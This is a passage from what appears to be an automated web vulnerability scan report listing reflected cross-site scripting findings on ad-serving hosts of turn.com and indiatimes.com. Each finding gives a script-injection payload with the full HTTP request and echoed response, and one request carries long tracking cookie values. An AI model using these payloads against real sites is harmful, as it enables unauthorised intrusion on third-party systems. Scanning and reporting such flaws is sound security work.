The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ce33"><script>alert(1)</script>d7ae152e1b0 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4ce33"><script>alert(1)</script>d7ae152e1b0 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/1032/1043/25149-30.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: clk=7Hx_mttILYcaGj7tvoj64c5L9E25aVFtHC3DnnO8uU7ED8lYMqmaterqQLDesEiWDoKqhfcRqvzHrWLLyqfvFzZSuDBgiISPYKlk2ZNLoMb50eIKJ_CMEcZpuuoeEp_6-dHiCifwjBHGabrqHhKf-vnR4gon8IwRxmm66h4Sn_oXobd4rwZ894cKMPF2lBOl; uid=7574652266400145248; adImpCount=60iq6er8DPb2DrVK1GzQBw1kk0rJCZQZpUbOAJrJtKjfaqaDzVRu9ZiuBStYaftYfkl0vggmknzfb2FVq3XvNxQc-UKfCLAbFVQTMXq7p3oojbc5jSbtXJYaLQ0rF9Dj8AHs-4xMQcDalzJekYOx75etmnEVVqcwX87-hMfG_-8p4Tsmf60hjv0UrB-YKXZpJSYYddhXDU21YP7ZMmzhBQ2J7Xjc2IE5_ee2WNeVFuHC31bDPn6BfQ8YTcomLcehwqZd1gChJVzXVJSoNPbAJ6CgEJQq7bUiAbzPbwpXvKy7to71DdlDWuQtzYxcO0prlcz-AkjmU62MI2Z6sJq5z-VqomsDJos5Vs_dNKwFRM2wJGUWu_NTG-QxRz2E327gdLHS7YSb5FHCWT4tf2lixyQtxJV5SASUDa1092pKKyCaJa0eAIb7MrNmBjk7kPzc3aNDIcLnfMuRhi6DLONVGhtWCRjRRTp6a3q-y6RdYYJX81-HpnN_SQq5y-4tr2AtvsWNAdCGROCkZj8dYic2Okm2eyBfim6w17VmnOzjyEJtS8iGwdEK7ISkD_Syde14bogzsXmYFNVzzzvASc9kYuIMIvteQr3JzJkJeEcyLSmKXoPqB58GgZl4LU47WFr7fj4TSpYdr_j7v-oZX2KjOqvNK7xm72g5Q2SXrO0m3VhN4oCnOlRpTcg_oQpC0ogA1ihNPtMxSw8zBEJhETLWoYqgxaNIjAnKcSQEauZ5SsBbm3j50pAbDl1kT86I4dowY0fVf1q6acOm4TJvmMitqDe_8TwnjKG1RDAQ1MviELosmlWRAEOhI3dLo0PwxNdlpa_3lC-7QGD6mIHu37lqZ6CgEJQq7bUiAbzPbwpXvKxTRYZdFJEdXrZUf_zOneXaUYN3SxU2Hy2gVc9rUrLrRe44y0vSf07rtqQRjYGSPSket_6BGmOs7SsWQKezHwDldLHS7YSb5FHCWT4tf2lix31zEjhbhyBpHRDs37B2KIuUFhq19VxFl3EOwTKpIvvNIBqcRa9YNXZtdXq0-4t1QaHiPLCEvaYK9753JDlicIxX81-HpnN_SQq5y-4tr2AtrLsBsO_MgmO9P0q7aScy2km2eyBfim6w17VmnOzjyEKPSuhSBUaVJA7h5YdI2YnDcOkhiAn-oTd0LgU-Mn1eD-IMIvteQr3JzJkJeEcyLSlo8KmtLYmhVy3hEyOca4pCSBN1DXOSgN16YHGhUfhYm7jXxjvPLPjHZGaGbCBovo9uvLYf01SVoGvBT_kzCmy7uOtwytR4QqWrSj2DBGFmQ33N6yo3gMUhVppJmR3nlje01bcPeC3rOHWsp6dbWMVWRM6LTCM7cepL8WNW-qtjQLGqp_QUmeBQCBZlakxeS1IXmoUB1SzZEjc_2-8le2IodMEiP0Au5wMPfYo5HYtsB5lnYV7IysMh6hWnWj061M2xnBpYuCIhLT0gm_BCByZ1iASJiCtKEaB8GWUTJpUF2J-TE68YL_n3OPsD3A3aM-LC6tqfs2cRW1nqIP3AYbgvZ4a_BQdcpq6oiZGZ9unyvEzopRTSAd6rw5LNJ9SxHXHNWUFMFZm_EMVo8JKSVTVDJvAHeERJA6E69gTBkpbwCzJ4CJwrWubttBZw4kvIRB78K1kF0PzWisQgqS5WongMcSOCHtKG74J2MZ0sAblgZtujg-E6GWztq3AqIkb_aTgzUTmFQMynYula8Y0T1XrThCl2aw35aAhBbwcmLeAGLeCYLD2Zg3z2XRTGLPQFbgf9ig6RaMXghk1wI39FuPXGsp97JcATQQWjrQEajSXuc9xa7zO7BXIjaT4dyKDZnZzXcYPzMJ6nR0jhFGB87dvVS1uha7LIZbVkCWkMOc3U6rjYXN0DBwkzzBRaGfFOd2kc9PQ-3wAuWOZKPokDsjTEMmZIGAaXPEjPoacsy0rd57TVtw94Les4daynp1tYxVZekftgDmfEsAz1sW_seyGYCe4f5XVCGNgw67SIzUWxcEd4FA3FdxgapLm19bCzCLi9qQBoL8b_WzULFT2HNiSDiASJiCtKEaB8GWUTJpUF2D42uzOttZQUS8K3Buse0mbC6tqfs2cRW1nqIP3AYbgvo6uDxGD1vUy34irPXP6_xv_26nvO0TvyN4QejVzcoorNWUFMFZm_EMVo8JKSVTVDPlClTpjPd9lGt5v7A0wLNjJ4CJwrWubttBZw4kvIRB6u7PPpYCApkh2mEUWoe_aQX4GxTrrk6pySrvtExD2hE9ujg-E6GWztq3AqIkb_aThmh9K78yLnWSK3JyewEktHhCl2aw35aAhBbwcmLeAGLecwfUopsMZqvqGNAc1JGWxhQ-vLOLGh4TD9E7jthPK1iBF5xi1_AnLVoreXns8BxtfB7qDCWoXq9VPffGEjQx3XcYPzMJ6nR0jhFGB87dvV8tq_nfueHsNqr9iZ8FDoKWFF8Uz9tIcbw3FW4dUyyvz4NOjt6clg5mVNxdTBrwU6uqyfor238QN1h1MpwN6cDbdSj7wHbh6NCr4-UMeQmi63Uo-8B24ejQq-PlDHkJounBL_sBfmIEgk_SOSqXJqL-ZheciNFzu8_MrM97k4-iaQzD9oqo48p_i1X6aCkT_IkMw_aKqOPKf4tV-mgpE_yCc-SzChZIRiAxLUayhWTBgnPkswoWSEYgMS1GsoVkwYJz5LMKFkhGIDEtRrKFZMGGlgE8hqrC5_un34DWOPzllcKfkmSJlOR-KbQtKTSdkTOMMKC0u63vhsuXcMNFIXk-r0d0_zDJX7wNOBiX5KL59j4-8iRj28L8iFSqDG5zIqpjfesmWMxmPaRKw6E89i_j4iP-5Yt5Cp4cCVVId_44TopNcuZ653PIDw2BW_MWvNZg-drXqP53sgEq4hQtoTf9sh2ll1bBTt5DNAkmY--xXbIdpZdWwU7eQzQJJmPvsVmz5MQSl0qrJOxvMeDHpqxON5tGdfmHhzd6A4bnn1NwxSI5a8Es-8zUHxYDaHn_A_jkPqAQa4uOx1Oax7d3oTJar4z1aBkOOJyIdydDuAYhDHYH5Mtiy47FgNyhJAPBVKx2B-TLYsuOxYDcoSQDwVSr4winjFFPNJ0RiWsBBD0vCzCOWzUnximTl9LEkfQWeq5Yem_Mhp6TvC2bNZwUB0KXGaL3JwQK7TPOebyWcKT2bS_-4kQdiYQNJGy81pStyV0v_uJEHYmEDSRsvNaUrclcO86LeOL8BnMi2BE56l83vDvOi3ji_AZzItgROepfN78HGgKNgqZM5a9ziTiXck4sydN4N-gFdG2W4nRaNwsQEUgvhkpoq3Vf1pJg8lsByQFIL4ZKaKt1X9aSYPJbAckPisiR0IFj_SZKyDlEFhnuD4rIkdCBY_0mSsg5RBYZ7gCYT172Ibqbb3GOaiYtPRSmq8eOeBTeD5aZlBVRg2q9S9CQWFk8c2KGgftnb0_IQ9DTk2GDZ_7U93S3q6M1BXpiBvVTmmjPz6O-Sa8l2ebgdUVY34XwZk7ScjAfMZtcz_WDpTK_lnY4sQS0zRaVStqVg6Uyv5Z2OLEEtM0WlUramY3syCM9B1_2JZmTN3hFH4hmGs3PbWtQqbaj68Q36t5fzxPBR0WkiAkOjdPNo3liY; fc=I9tPGCYm-oMBoCeCxIYWNTmiBnv_9MPplxVq6gg6yDbCYFYSzMBGx6XF0tVL-nRpghqd35x0aLMR0cn-pY5vkcKcgkqtBl9Nqy9vQFi3bLb5KIUiQw0WG7OCvaIgI5LuKDuG8M40ItmVKjKRRqpITPRfumm7y1br7uBEymwi10cozZDKxVUx57FyJzqofOfd; pf=VRtY5HdMnUxaPsHiy_N5HCTJPrJ1hJXnC0O2WDsdGQeslIdY9x7dyBhh1KltCB0Ko3Lqm5N2zasCOTrmNxungQUg8KVfAcurjRKURzu6r6c63lV346yyKju4h477-SBQ0pnfIYe5d8kNJsDUEsJr5s7gtUSugwg4Hwp28O7bo2jA8bDdfuLNLG7EWaasIze3RTB7N5-lJIg6p_BquwrLiQ; rrs=undefined%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10; rds=undefined%7C14928%7C14928%7C14934%7Cundefined%7C14928%7C14928%7C14928%7C14928%7C14928%7C14928%7C14921%7C14918; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7574652266400145248; Domain=.turn.com; Expires=Sat, 21-May-2011 23:16:40 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 22 Nov 2010 23:16:40 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=7574652266400145248&rnd=2538171173860555251&fpid=4ce33"><script>alert(1)</script>d7ae152e1b0&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

2.22. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1075762926@Position4 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1075762926@Position4

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6a96"><script>alert(1)</script>8c96460f796 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.coma6a96"><script>alert(1)</script>8c96460f796/TOI2009_Home/index.html/1075762926@Position4 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:49 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 370
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.coma6a96"><script>alert(1)</script>8c96460f796/TOI2009_Home/index.html/996779244/Position4/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.23. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1075762926@Position4 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1075762926@Position4

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3e7c"><script>alert(1)</script>d2e2e1bb692 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Homeb3e7c"><script>alert(1)</script>d2e2e1bb692/index.html/1075762926@Position4 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:50 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 371
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_Homeb3e7c"><script>alert(1)</script>d2e2e1bb692/index.html/1208187943/Position4/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.24. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1075762926@Position4 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1075762926@Position4

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d61"><script>alert(1)</script>8672742855c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html98d61"><script>alert(1)</script>8672742855c/1075762926@Position4 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:51 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 370
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_Home/index.html98d61"><script>alert(1)</script>8672742855c/680174710/Position4/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.25. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1862226389@Position4 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1862226389@Position4

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3754e"><script>alert(1)</script>24bb0135b80 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com3754e"><script>alert(1)</script>24bb0135b80/TOI2009_Home/index.html/1862226389@Position4 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:49 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 371
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com3754e"><script>alert(1)</script>24bb0135b80/TOI2009_Home/index.html/2060019896/Position4/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.26. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1862226389@Position4 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1862226389@Position4

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3573"><script>alert(1)</script>b911439e4db was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Homef3573"><script>alert(1)</script>b911439e4db/index.html/1862226389@Position4 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:50 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 370
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_Homef3573"><script>alert(1)</script>b911439e4db/index.html/801623042/Position4/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.27. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1862226389@Position4 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1862226389@Position4

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 595e1"><script>alert(1)</script>1627fee015c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html595e1"><script>alert(1)</script>1627fee015c/1862226389@Position4 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:51 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 370
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_Home/index.html595e1"><script>alert(1)</script>1627fee015c/304825741/Position4/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.28. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab08"><script>alert(1)</script>a506fa6e20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com1ab08"><script>alert(1)</script>a506fa6e20/TOI2009_TOPICS/index.html/1407984949@Right1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:50 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 369
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com1ab08"><script>alert(1)</script>a506fa6e20/TOI2009_TOPICS/index.html/1073587341/Right1/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.29. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e91"><script>alert(1)</script>4d0a5b31f8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICSd0e91"><script>alert(1)</script>4d0a5b31f8/index.html/1407984949@Right1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:50 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 368
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_TOPICSd0e91"><script>alert(1)</script>4d0a5b31f8/index.html/143794577/Right1/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.30. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73f19"><script>alert(1)</script>ee340078dd8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html73f19"><script>alert(1)</script>ee340078dd8/1407984949@Right1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:52 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 369
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html73f19"><script>alert(1)</script>ee340078dd8/279233813/Right1/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.31. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf8a"><script>alert(1)</script>7a478a5f803 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/6cf8a"><script>alert(1)</script>7a478a5f803 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:53 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 483
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/6cf8a"><script>alert(1)</script>7a478a5f803/1678677789/UNKNOWN/OasDefault/781102WPeopleInteTOIROSGener_NRI/26_times_728x90_28OCT.gif/61653761313764613463656230316230" target="_Blank">
...[SNIP]...

2.32. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fea50"><script>alert(1)</script>a91bcf26395 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.comfea50"><script>alert(1)</script>a91bcf26395/TOI2009_TOPICS/index.html/1934160555@Right1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:49 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 368
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.comfea50"><script>alert(1)</script>a91bcf26395/TOI2009_TOPICS/index.html/49299385/Right1/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.33. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0948"><script>alert(1)</script>24b865a29dc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICSc0948"><script>alert(1)</script>24b865a29dc/index.html/1934160555@Right1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:50 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 369
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_TOPICSc0948"><script>alert(1)</script>24b865a29dc/index.html/906476266/Right1/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.34. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1

Issue detail

